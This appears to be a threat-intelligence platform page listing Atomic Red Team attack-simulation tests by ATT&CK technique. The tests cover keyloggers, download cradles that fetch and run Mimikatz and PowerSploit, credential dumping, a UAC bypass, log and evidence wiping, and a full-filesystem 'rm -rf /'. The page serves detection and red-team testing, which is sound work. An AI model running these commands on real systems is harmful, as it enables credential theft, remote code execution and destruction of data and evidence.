tail /var/log/messages

bashlinuxBash session based keylogger

trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
echo "Hello World!"
cat #{output_file}

shelevatedlinuxSSHD PAM keylogger

cp -v /etc/pam.d/sshd /tmp/
echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
systemctl restart sshd
systemctl restart auditd
ssh #{user_account}@localhost 
whoami
sudo su
whoami
exit
exit

shelevatedlinuxAuditd keylogger

auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
auditctl -a always,exit -F arch=b32 -S execve -k CMDS
whoami; ausearch -i --start now

bashmacosMacOS Swift Keylogger

swift #{swift_src} -keylog

T1057 Process Discovery · 9 tests

shlinux, macosProcess Discovery - ps

ps >> #{output_file}
ps aux >> #{output_file}

command_promptwindowsProcess Discovery - tasklist

tasklist

powershellwindowsProcess Discovery - Get-Process

Get-Process

powershellwindowsProcess Discovery - get-wmiObject

get-wmiObject -class Win32_Process

command_promptwindowsProcess Discovery - wmic process

wmic process get /format:list

command_promptwindowsDiscover Specific Process - tasklist

tasklist | findstr #{process_to_enumerate}

powershellelevatedwindowsProcess Discovery - Process Hacker

Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"

powershellelevatedwindowsProcess Discovery - PC Hunter

Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"

command_promptwindowsLaunch Taskmgr from cmd to View running processes

taskmgr.exe /7

T1059 Command and Scripting Interpreter · 1 test

powershellwindowsAutoIt Script Execution

Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"

T1059.001 PowerShell · 22 tests

command_promptelevatedwindowsMimikatz

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"

powershellwindowsRun BloodHound from local disk

import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5

powershellwindowsRun Bloodhound from Memory using Download Cradle

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5

powershellelevatedwindowsMimikatz - Cradlecraft PsSendKeys

$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr

command_promptwindowsInvoke-AppPathBypass

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"

command_promptwindowsPowershell MsXml COM object - with prompt

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"

command_promptwindowsPowershell XML requests

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"

command_promptwindowsPowershell invoke mshta.exe download

C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"

manualwindowsPowershell Invoke-DownloadCradle

powershellwindowsPowerShell Fileless Script Execution

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

powershellwindowsNTFS Alternate Data Stream Access

Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand

powershellelevatedwindowsPowerShell Session Creation and Use

New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

command_promptwindowsPowerShell Command Execution

powershell.exe -e  #{obfuscated_code}

powershellelevatedwindowsPowerShell Invoke Known Malicious Cmdlets

$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}

powershellwindowsPowerUp Invoke-AllChecks

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks

powershellwindowsAbuse Nslookup with DNS Records

# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]

powershellwindowsSOAPHound - Dump BloodHound Data

#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}

powershellwindowsSOAPHound - Build Cache

#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}

T1059.003 Windows Command Shell · 6 tests

powershellwindowsCreate and Execute Batch Script

Start-Process "#{script_path}"

command_promptwindowsWrites text to a file and displays it.

echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"

command_promptwindowsSuspicious Execution via Windows Command Shell

%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}

powershellwindowsSimulate BlackByte Ransomware Print Bombing

cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null

command_promptwindowsCommand Prompt read contents from CMD file and execute

cmd /r cmd<"#{input_file}"

command_promptelevatedwindowsCommand prompt writing script to file then executes it

 c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs

T1059.005 Visual Basic · 3 tests

powershellwindowsVisual Basic script execution to gather local computer information

cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt

powershellwindowsEncoded VBS code execution

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"

powershellwindowsExtract Memory via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"

T1059.007 JavaScript · 2 tests

command_promptwindowsJScript execution to gather local computer information via cscript

cscript "#{jscript}" > %tmp%\T1059.007.out.txt

command_promptwindowsJScript execution to gather local computer information via wscript

wscript "#{jscript}"

T1070 Indicator Removal · 2 tests

command_promptelevatedwindowsIndicator Removal using FSUtil

fsutil usn deletejournal /D C:

powershellwindowsIndicator Manipulation using FSUtil

if (-not (Test-Path "#{file_to_manipulate}")) { New-Item "#{file_to_manipulate}" -Force } 
echo "1234567890" > "#{file_to_manipulate}"
fsutil  file setZeroData offset=0 length=#{file_data_length} "#{file_to_manipulate}"

T1070.004 File Deletion · 11 tests

shlinux, macosDelete a single file - FreeBSD/Linux/macOS

rm -f #{file_to_delete}

shlinux, macosDelete an entire folder - FreeBSD/Linux/macOS

rm -rf #{folder_to_delete}

shlinuxOverwrite and delete a file with shred

shred -u #{file_to_shred}

command_promptwindowsDelete a single file - Windows cmd

del /f #{file_to_delete}

command_promptwindowsDelete an entire folder - Windows cmd

rmdir /s /q #{folder_to_delete}

powershellwindowsDelete a single file - Windows PowerShell

Remove-Item -path #{file_to_delete}

powershellwindowsDelete an entire folder - Windows PowerShell

Remove-Item -Path #{folder_to_delete} -Recurse

shlinuxDelete Filesystem - Linux

[ "$(uname)" = 'Linux' ] && rm -rf / --no-preserve-root > /dev/null 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null

powershellelevatedwindowsDelete Prefetch File

Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])

powershellwindowsDelete TeamViewer Log Files

New-Item -Path #{teamviewer_log_file} -Force | Out-Null
Remove-Item #{teamviewer_log_file} -Force -ErrorAction Ignore

command_promptelevatedwindowsClears Recycle bin via rd

rd /s /q %systemdrive%\$RECYCLE.BIN

T1071 Application Layer Protocol · 1 test

powershellwindowsTelnet C2

#{client_path} #{server_ip} --port #{server_port}

▶

Tools Used

0 mapped

Other tooling / TTPs (curation, not ATT&CK-mapped):

MEMENTO LABS ACTORMOBILE PLATFORMS EXCLUSIVE FOCUS POST-2025SCOUT PAYLOADSOLDIER PAYLOAD

◈

CVEs Exploited

CVECVE-2025-2783

Intelligence Graph · click any node to traverse

CVETechnique ActorTool Family

drag to reposition · click any node to traverse · button top-right enlarges

External lookups - second-class, for what we don’t hold ourselves

MITRE search Malpedia Google

Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities

Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs

Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures

Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1

About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service

threatengine.sh · Open-source threat intelligence platform · 100+ authoritative sources · Every fact traces to its origin